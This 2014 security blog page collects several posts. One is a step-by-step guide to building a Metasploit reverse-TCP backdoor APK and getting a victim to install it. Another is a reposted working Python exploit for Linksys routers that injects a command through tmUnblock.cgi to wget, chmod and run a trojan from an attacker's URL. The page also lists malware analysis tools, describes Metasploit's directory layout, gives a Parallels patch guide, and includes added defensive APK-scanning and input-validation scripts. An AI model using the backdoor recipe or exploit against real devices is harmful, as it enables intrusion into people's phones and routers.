Feb 22, 2014

Howto: Getting Shell on Android with Metasploit

1. Create the backdoor APK:
sudo msfpayload android/meterpreter/reverse_tcp LHOST=<Hacker_IP> LPORT=<Hacker_Port> R > app.apk

2. Run the Metasploit console (msfconsole)

3. Listen for the incoming connection from the Android device:
  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set lhost <Hacker_IP> (same IP as in Step 1)
  • set lport <Hacker_Port> (same port as in Step 1)

4. Send the APK to the Android phone

5. Install the APK on the Android phone

6. Run the application that was installed

7. Now watch your msfconsole; the Android device will connect back to it.

8. Try any post-exploitation modules and have fun :)
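As an added defender-side example (not part of the original post, and not Metasploit's own code): a small Python script that inspects an APK for the package name the Metasploit Android stager has used, `com.metasploit.stage`. That indicator is an assumption drawn from generated payloads rather than from the post, so treat the list as something to extend; the sample APK the script builds is constructed test data, not a real app.

```python
import io
import sys
import zipfile

# Indicator byte strings to look for (assumption: the package name the Metasploit
# Android stager has used; extend this list for other families).
INDICATORS = [
    b"com/metasploit/stage",   # dex class-descriptor form, e.g. Lcom/metasploit/stage/Payload;
    b"com.metasploit.stage",   # package-name form as stored in the manifest string pool
]


def encoded_forms(indicator):
    """Return the raw (UTF-8) and UTF-16LE forms; binary AndroidManifest.xml may use either."""
    return [indicator, indicator.decode("ascii").encode("utf-16-le")]


def scan_apk(data):
    """Return {entry_name: [matched indicators]} for dex and manifest entries that hit."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(data)) as apk:
        for name in apk.namelist():
            if not (name.endswith(".dex") or name == "AndroidManifest.xml"):
                continue
            blob = apk.read(name)
            found = [ind.decode("ascii") for ind in INDICATORS
                     if any(form in blob for form in encoded_forms(ind))]
            if found:
                hits[name] = found
    return hits


def build_sample_apk(stager_like):
    """Construct a minimal fake APK in memory (constructed test data, not a real app)."""
    if stager_like:
        dex_class = b"Lcom/metasploit/stage/Payload;"
        package = "com.metasploit.stage"
    else:
        dex_class = b"Lcom/example/notes/MainActivity;"
        package = "com.example.notes"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        # Fake dex: magic header followed by a class descriptor as it would sit in the string table.
        z.writestr("classes.dex", b"dex\n035\x00" + dex_class)
        # Fake binary manifest: a few header bytes followed by a UTF-16LE string.
        z.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00" + package.encode("utf-16-le"))
        z.writestr("res/layout/main.xml", b"not inspected")
    return buf.getvalue()


def main(argv):
    # Scan a real APK when a path is given, otherwise the constructed sample.
    data = open(argv[1], "rb").read() if len(argv) > 1 else build_sample_apk(True)
    hits = scan_apk(data)
    if not hits:
        print("no Metasploit stager indicators found")
    for entry, found in hits.items():
        print("%s: %s" % (entry, ", ".join(found)))
    return 1 if hits else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python scan_apk.py app.apk`; a non-zero exit code means an indicator was found. A string match like this is cheap to evade by renaming the package, so in practice it belongs next to a look at the requested permissions and at what the app connects to once it runs.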

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Feb 18, 2014

Malware Analysis Tools List

•    Process Explorer with VirusTotal integration (http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx)
•    Process Monitor - advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity (http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx)
•    PEStudio - a tool for the static investigation of any Windows executable binary (http://www.winitor.com/)
•    Automater - a URL/domain, IP address and MD5 hash OSINT tool aimed at making the analysis process easier for intrusion analysts. Given a target (URL, IP or hash) or a file full of targets, Automater returns relevant results from its sources (http://www.tekdefense.com/automater/)
•    Noriben - malware analysis sandbox (https://github.com/Rurik/Noriben)
•    Regshot - registry compare utility that lets you quickly take a snapshot of your registry and compare it with a second one taken after making system changes or installing a new software product (http://sourceforge.net/projects/regshot/)
•    CaptureBAT - Capture BAT is a behavioral analysis tool for applications on the Win32 operating system family. It monitors the state of a system during the execution of applications and the processing of documents, giving an analyst insight into how the software operates even when no source code is available (http://www.honeynet.org/node/315)

Source: http://journeyintoir.blogspot.kr/2014/02/linkz-4-mostly-malware-related-tools.html
Source: http://blog.hackersonlineclub.com/2014/02/behavior-investigation-of-malware.html


Metasploit Directory Structure

Normally when you use Metasploit, everything you use in it is saved under a .msf4 directory in your home directory, such as /root/.msf4 or /home/hacker/.msf4. Inside .msf4 you will find:
- database.yml = default database configuration for Metasploit
- history = the command history of what we typed
- logs/framework.log = error log
- loot/ = everything you collect, such as screen captures and hashes, is saved in this folder.
- modules/ = all of the modules you create personally are saved here. They are loaded when msfconsole runs.
- plugins/ = all of the plugins you create personally

Now if you go to the Metasploit folder itself, you will find the structure of Metasploit:
- data/ = data files such as wordlists.
- doc = you can create it with "yard doc". This directory holds the Metasploit documentation. To view it, set up a web server with its document root pointing here, or run `python -m SimpleHTTPServer` inside it; that gives you a web server on port 8000. Browse to it and you get the Metasploit doc website.
- external = external source code.
- lib = library directory
- modules/ = all of the modules in Metasploit
- plugins/ = plugin directory for Metasploit 4
- scripts/ = Meterpreter scripts.
- tools/ = standalone tools that do their job without loading the full framework.

Source: http://hak5.org/episodes/metasploit-minute/the-metasploit-directory-structure-metasploit-minute



Tools: Linksys Remote Root Exploit

Linksys Remote Root Exploit
infodox - insecurety research
This is the exploit this "Moon" worm uses.
Trivial blind cmd injection :)
This version crippled - uses wget.
Twitter: @info_dox
Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku
import requests
import sys

def banner():
    print """\x1b[0;32m
.____    .__        __                          
|    |   |__| ____ |  | __  _________.__. ______
|    |   |  |/    \|  |/ / /  ___<   |  |/  ___/
|    |___|  |   |  \    <  \___ \ \___  |\___ \ 
|_______ \__|___|  /__|_ \/____  >/ ____/____  >
        \/       \/     \/     \/ \/         \/ 
       You are the weakest link. Goodbye.
Linksys remote root - infodox - Insecurety Research.
Version 2: Crippled (wget shelldrop only)
"""

def upShell(wget_url, target):
    """ This works with the normal busybox wget at least, and worked in testing"""
    cmd = "wget %s -O /tmp/.trojan;chmod 777 /tmp/.trojan;/tmp/.trojan" %(wget_url)
    print "{+} Planting Bomb!"
    execute_command(target=target, command=cmd)
    print "{!} TERRORISTS WIN!"

def execute_command(target, command):
    url = target + "/tmUnblock.cgi"
    injection = "-h `%s`" %(command)
    # this is a very sexy POST request. TOTALLY LEGIT.
    the_ownage = {'submit_button': '',
                  'change_action': '', 
                  'action': '', 
                  'commit': '0',
                  'ttcp_num': '2',
                  'ttcp_size': '2',
                  'ttcp_ip': injection,
                  'StartEPI': '1'}
    headers = {'User-Agent': 'Mozilla/4.0 (compatible; Opera/3.0; Windows 4.10) 3.51 [en]'}
    # it is truly mad hax.
    mad_hax = requests.post(url=url, data=the_ownage, headers=headers)

def main(args):
    if len(sys.argv) != 3:
        sys.exit("usage: %s http://target http://me.com/trojan.bin" %(sys.argv[0]))
    upShell(wget_url=sys.argv[2], target=sys.argv[1])

if __name__ == "__main__":
    main(sys.argv)
Source: http://pastebin.com/raw.php?i=6GDbYfmB
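As an added defender-side example (not part of the original post and not the exploit author's code): the script above works because the `ttcp_ip` field of `tmUnblock.cgi` reaches a shell unvalidated, so the value `-h \`...\`` becomes both an option and a backtick command substitution. The Python below shows the allow-list check that field should have had, and applies it as a triage rule over constructed request-log lines. The log line format, the `classify_request`/`triage` names and the placeholder URL are assumptions made for the example.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# Characters that let a value break out of a shell command line. A field that is
# supposed to hold an IP address never legitimately contains any of them.
SHELL_META = re.compile(r"[`$;|&<>\n\r\\(){}]")


def valid_ttcp_ip(value):
    """Allow-list check: accept only a literal IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


def classify_request(path, body):
    """Verdict for one request: 'ignore', 'benign', 'injection' or 'malformed'."""
    if not path.endswith("/tmUnblock.cgi"):
        return "ignore"
    fields = parse_qs(body, keep_blank_values=True)
    value = fields.get("ttcp_ip", [""])[0]
    if valid_ttcp_ip(value):
        return "benign"
    # Option injection ("-h ...") and shell metacharacters are the shapes the
    # exploit above relies on; anything else is still rejected, just ranked lower.
    if value.startswith("-") or SHELL_META.search(value):
        return "injection"
    return "malformed"


def triage(log_lines):
    """Apply classify_request to 'METHOD PATH BODY' lines; return one verdict per line."""
    verdicts = []
    for line in log_lines:
        parts = line.split(" ", 2)
        path = parts[1] if len(parts) > 1 else ""
        body = parts[2] if len(parts) > 2 else ""
        verdicts.append(classify_request(path, body))
    return verdicts


# Constructed sample log (assumed 'METHOD PATH BODY' format): a legitimate ttcp run,
# the URL-encoded injection shape used by the exploit above with a placeholder URL,
# and an unrelated request.
SAMPLE_LOG = [
    "POST /tmUnblock.cgi submit_button=&change_action=&action=&commit=0"
    "&ttcp_num=2&ttcp_size=2&ttcp_ip=192.168.1.10&StartEPI=1",
    "POST /tmUnblock.cgi submit_button=&change_action=&action=&commit=0"
    "&ttcp_num=2&ttcp_size=2&ttcp_ip=-h+%60wget+http%3A%2F%2Fexample.invalid%2Fx%60&StartEPI=1",
    "GET /index.html",
]

if __name__ == "__main__":
    for line, verdict in zip(SAMPLE_LOG, triage(SAMPLE_LOG)):
        print("%-9s %s" % (verdict, line[:60]))
```

The point of `valid_ttcp_ip` is that it is an allow-list, not a blocklist: the CGI should accept only something `ipaddress` parses and otherwise refuse the request, and ideally pass the address to the diagnostic program as an argv element rather than through a shell at all. The `SHELL_META` pattern is only used to rank rejected values for alerting.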


Feb 17, 2014

Howto: Installing Parallels Tools of Parallels Desktop 9 on Kali (Linux Kernel Version 3.12)

1. Mount the Parallels Tools CD in the virtual machine (Virtual Machine -> Install/Reinstall Parallels Tools)

2. Download the patch from http://pastebin.com/8imsrmcN
3. Make a temporary copy of Parallels Tools, enter it and patch it:
$ cp -R /media/$USER/Parallels\ Tools /tmp/
$ cd /tmp/Parallels\ Tools/kmods
$ tar -xaf prl_mod.tar.gz
$ patch -p1 -d prl_fs < parallels-tools-linux-3.12-prl-fs-9.0.23350.941886.patch
$ tar -czf prl_mod.tar.gz prl_eth prl_fs prl_fs_freeze prl_tg Makefile.kmods dkms.conf

4. Install normally:
$ sudo /tmp/Parallels\ Tools/install

5. Reboot

Source: http://forum.parallels.com/showthread.php?294092-Fix-Patch-for-Parallel-Tools-9-0-23350-to-support-Linux-Kernel-3-12-%28Ubuntu-14-04%29
